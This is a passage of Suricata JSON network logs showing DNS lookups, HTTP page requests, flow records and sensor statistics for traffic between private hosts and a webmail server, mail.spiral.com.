Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8119},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47734,"tx_id":0}} {"timestamp":"2020-02-29T00:17:23.536842+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31688,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:23.645551+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34841,"proto":"UDP","dns":{"type":"answer","id":31688,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:23.645551+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34841,"proto":"UDP","dns":{"type":"answer","id":31688,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:23.720422+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5559}} 
{"timestamp":"2020-02-29T00:17:25.000160+0000","event_type":"stats","stats":{"uptime":14697,"capture":{"kernel_packets":136295,"kernel_drops":0},"decoder":{"pkts":136310,"bytes":93713038,"invalid":191,"ipv4":134787,"ipv6":10,"ethernet":136310,"raw":0,"null":0,"sll":0,"tcp":129385,"udp":5196,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2802,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2818,"synack":2809,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1840,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2377,"failed_udp":112},"tx":{"http":4705,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2457}},"flow_mgr":{"closed_pruned":2784,"new_pruned":16,"est_pruned":2427,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21489,"memcap_state":0,"memcap_global":0},"http":{"memuse":53624,"memcap":0}}} 
{"timestamp":"2020-02-29T00:17:26.393012+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54415,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60400,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:26.501632+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54415,"proto":"UDP","dns":{"type":"answer","id":60400,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:26.501632+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54415,"proto":"UDP","dns":{"type":"answer","id":60400,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:26.651304+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6988}} {"timestamp":"2020-02-29T00:17:27.159302+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60762,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35202,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:17:27.267472+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60762,"proto":"UDP","dns":{"type":"answer","id":35202,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:27.267472+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60762,"proto":"UDP","dns":{"type":"answer","id":35202,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:27.371073+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17052,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:27.479187+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34842,"proto":"UDP","dns":{"type":"answer","id":17052,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:27.479187+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34842,"proto":"UDP","dns":{"type":"answer","id":17052,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:17:28.000481+0000","flow_id":1565664501029723,"event_type":"flow","src_ip":"192.168.10.122","src_port":42020,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:27.645979+0000","end":"2020-02-29T00:12:27.754252+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:28.721639+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5559},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":29494,"tx_id":1}} {"timestamp":"2020-02-29T00:17:29.000319+0000","flow_id":1151071323182789,"event_type":"flow","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":2061,"bytes_toclient":1048,"start":"2020-02-29T00:16:20.087749+0000","end":"2020-02-29T00:16:28.369273+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:29.282797+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34864,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) 
AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6988},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37030,"tx_id":0}} {"timestamp":"2020-02-29T00:17:29.293462+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57080,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:29.401593+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51707,"proto":"UDP","dns":{"type":"answer","id":57080,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:29.401593+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51707,"proto":"UDP","dns":{"type":"answer","id":57080,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:29.490446+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5124}} {"timestamp":"2020-02-29T00:17:31.000306+0000","flow_id":1009264372926241,"event_type":"flow","src_ip":"192.168.10.122","src_port":50814,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:30.444193+0000","end":"2020-02-29T00:12:30.552573+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:32.000182+0000","event_type":"stats","stats":{"uptime":14704,"capture":{"kernel_packets":136375,"kernel_drops":0},"decoder":{"pkts":136386,"bytes":93749613,"invalid":192,"ipv4":134859,"ipv6":10,"ethernet":136386,"raw":0,"null":0,"sll":0,"tcp":129446,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"clo
sed_pruned":2786,"new_pruned":16,"est_pruned":2428,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22151,"memcap_state":0,"memcap_global":0},"http":{"memuse":53676,"memcap":0}}} {"timestamp":"2020-02-29T00:17:34.495901+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34864,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5124},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":24087,"tx_id":1}} {"timestamp":"2020-02-29T00:17:35.000918+0000","flow_id":1661936193407531,"event_type":"flow","src_ip":"192.168.10.122","src_port":56201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.494123+0000","end":"2020-02-29T00:12:34.602655+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:35.001148+0000","flow_id":964081317209505,"event_type":"flow","src_ip":"192.168.10.122","src_port":58854,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.681377+0000","end":"2020-02-29T00:12:34.789685+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:17:36.000818+0000","flow_id":1937329496453146,"event_type":"flow","src_ip":"192.168.10.122","src_port":38808,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.913434+0000","end":"2020-02-29T00:12:35.022032+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:38.000914+0000","flow_id":571869214283118,"event_type":"flow","src_ip":"192.168.10.130","src_port":34856,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1223,"bytes_toclient":9670,"start":"2020-02-29T00:16:32.005486+0000","end":"2020-02-29T00:16:37.187743+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:17:39.000237+0000","event_type":"stats","stats":{"uptime":14711,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2786,"new_pruned":16,"est_pruned":2432,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21158,"memcap_state":0,"memcap_global":0},"http":{"memuse":36692,"memcap":0}}} 
{"timestamp":"2020-02-29T00:17:39.002411+0000","flow_id":745403072685010,"event_type":"flow","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":2042,"bytes_toclient":12710,"start":"2020-02-29T00:16:28.369618+0000","end":"2020-02-29T00:16:38.383459+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:39.002598+0000","flow_id":2162338538366341,"event_type":"flow","src_ip":"192.168.10.122","src_port":38589,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:38.435589+0000","end":"2020-02-29T00:12:38.543962+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.000418+0000","flow_id":1172073699101454,"event_type":"flow","src_ip":"192.168.10.122","src_port":35264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.805646+0000","end":"2020-02-29T00:12:44.913873+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.001175+0000","flow_id":224552373988062,"event_type":"flow","src_ip":"192.168.10.122","src_port":54903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.600798+0000","end":"2020-02-29T00:12:44.709050+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:17:45.001359+0000","flow_id":1915120221140576,"event_type":"flow","src_ip":"192.168.10.122","src_port":34113,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:43.898656+0000","end":"2020-02-29T00:12:44.006850+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:46.000182+0000","event_type":"stats","stats":{"uptime":14718,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2788,"new_pruned":16,"est_pruned":2433,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checke
d":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19838,"memcap_state":0,"memcap_global":0},"http":{"memuse":36612,"memcap":0}}} {"timestamp":"2020-02-29T00:17:46.002322+0000","flow_id":989009308065649,"event_type":"flow","src_ip":"192.168.10.122","src_port":41034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.958321+0000","end":"2020-02-29T00:12:45.066699+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:48.000764+0000","flow_id":1965379946389945,"event_type":"flow","src_ip":"fe80:0000:0000:0000:f816:3eff:fe73:695a","dest_ip":"ff02:0000:0000:0000:0000:0000:0000:0002","proto":"IPv6-ICMP","icmp_type":133,"icmp_code":0,"flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":70,"bytes_toclient":0,"start":"2020-02-29T00:17:17.958905+0000","end":"2020-02-29T00:17:17.958905+0000","age":0,"state":"new","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:50.000513+0000","flow_id":1057054490648417,"event_type":"flow","src_ip":"192.168.10.81","src_port":52766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":13,"bytes_toserver":1099,"bytes_toclient":10115,"start":"2020-02-29T00:16:44.024417+0000","end":"2020-02-29T00:16:49.489828+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:17:50.000663+0000","flow_id":101213813529097,"event_type":"flow","src_ip":"192.168.10.130","src_port":34858,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":19,"bytes_toserver":1416,"bytes_toclient":20622,"start":"2020-02-29T00:16:38.383497+0000","end":"2020-02-29T00:16:49.869586+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:52.000591+0000","flow_id":340808549256710,"event_type":"flow","src_ip":"192.168.10.122","src_port":59515,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:51.118278+0000","end":"2020-02-29T00:12:51.226233+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:52.001953+0000","flow_id":1932059572600311,"event_type":"flow","src_ip":"192.168.10.122","src_port":49307,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:50.949751+0000","end":"2020-02-29T00:12:51.058015+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:17:53.000183+0000","event_type":"stats","stats":{"uptime":14725,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2790,"new_pruned":17,"est_pruned":2437,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":36532,"memcap":0}}} 
